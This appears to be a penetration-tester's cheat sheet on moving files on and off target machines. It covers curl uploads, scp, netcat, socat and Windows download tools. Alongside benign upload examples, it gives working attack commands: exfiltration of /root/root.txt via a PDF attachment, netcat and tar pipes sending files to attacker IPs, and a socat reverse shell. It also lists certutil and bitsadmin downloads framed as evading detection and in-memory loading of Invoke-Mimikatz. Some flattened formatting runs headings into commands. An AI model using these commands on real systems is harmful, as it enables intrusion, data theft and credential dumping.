File Transfer
Listeners and binaries
curl
File Upload
curl -T example.txt https://example.com/uploadFile Upload + POST
curl -T example.txt -X POST https://example.com/uploadFile upload + Authentication
curl -u user:pass -T example.txt https://example.com/uploadFile Upload + Token Authentication
curl -u :YOUR_TOKEN -T example.txt https://example.com/uploadFile Upload + Custom Header
curl -H "Authorization: Bearer YOUR_TOKEN" -T example.txt https://example.com/uploadFile Upload + Multiple Custom Headers
curl -H "Authorization: Bearer YOUR_TOKEN" -H "Content-Type: application/json" -T example.txt https://example.com/uploadMultiple File Uploads
curl -T file1.txt -T file2.txt https://example.com/uploadFile Upload as Form submission
curl -F "file=@example.txt" https://example.com/uploadFile Upload + Additional Query Parameters
curl -T example.txt "https://example.com/upload?user=alice×tamp=2024"File Upload + Redirect
curl -L -T example.txt https://example.com/uploadFile Upload + Retry
curl --retry 5 -T example.txt https://example.com/uploadFile Upload to FTP server
curl -T example.txt ftp://ftp.example.com/upload/File Upload + Custom HTTP Method
curl -X PATCH -T example.txt https://example.com/uploadFile transfer on compromised Apache servers
Copy a file into Apache Web Directory
With the right permissions, you can copy the file to
/var/www/htmlso it can be access from the URLhttp://<server-ip>/file.txt.
cp archivo.txt /var/www/htmlGive ownership to the web user
sudo chown www-data:www-data /var/www/html/archivo.txtSet the file to be read by everyone
sudo chmod 644 /var/www/html/archivo.txtUploading via Apache (web interface)
Ensure the appropriate
upload_max_filesizeandpost_max_sizedirectives are set in thephp.inifile.Normally is located here
/etc/php/7.x/apache2/php.ini
upload_max_filesize = 50M
post_max_size = 50MUse pd4ml.jar to exfill files attaching then to the PDF
POC
<html>
<pd4ml:attachment src="/root/root.txt"/>
</html>
With PHP code execution
One liner
php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'Secure Copy Protocol scp
From local machine to remote host
scp localfile username@remotehost:/path/to/destination/From remote host to local machine
scp username@remotehost:/path/to/remotefile /local/path/Specific Port
scp -P 47502 linpeas.sh user1@83.136.252.198:/home/user1With key
scp -i ~/.ssh/key linpeas.sh professor@10.10.10.131:/home/professor/From local to Apache Server
scp archivo.txt user@remote-server:/var/www/html/Using Netcat
Host
nc -lvp <Local_PORT> > fileClient
nc <Target_IP> <port> < fileWith cat
cat <file> | nc Target_IP 443Use tar for directories
tar -cf - .thunderbird | nc 10.10.16.10 4445Using Socat
Listener
socat file:`tty`,raw,echo=0 tcp-listen:4444Target Machine
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444Windows
curl
curl http://ip/file -o <output>wget
wget http://ip/file -OutFile <output>certutil
First, start a python web server
python3 -m http.server 443Then
certutil.exe -f -urlcache -split http://<IP>/<file>Sneaky Version
certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exeInvoke-WebRequest
First, start a python web-server
python3 -m http.server 443Then
IWR -uri http://<ip>/<file> -OutFile <file_name>Uses Chrome User Agent
Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"Upload a file
Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64Impacket
First, create a SMB share folder
impacket-smbserver <share_name> <file_path> -smb2supportThen, copy the files
copy \\<ip>\share\<file> <destination_path>System.Net.WebClient
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://ip/file', '<output>')Bitsadmin
Download files stealthily and evade detection, as bitsadmin is a native tool and might be overlooked by some security solutions.
bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exeModern Version
Start-BitsTransfer -Source http://10.10.10.32/nc.exe -Destination C:\Temp\nc.exeIn-memory execution
Mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')Last updated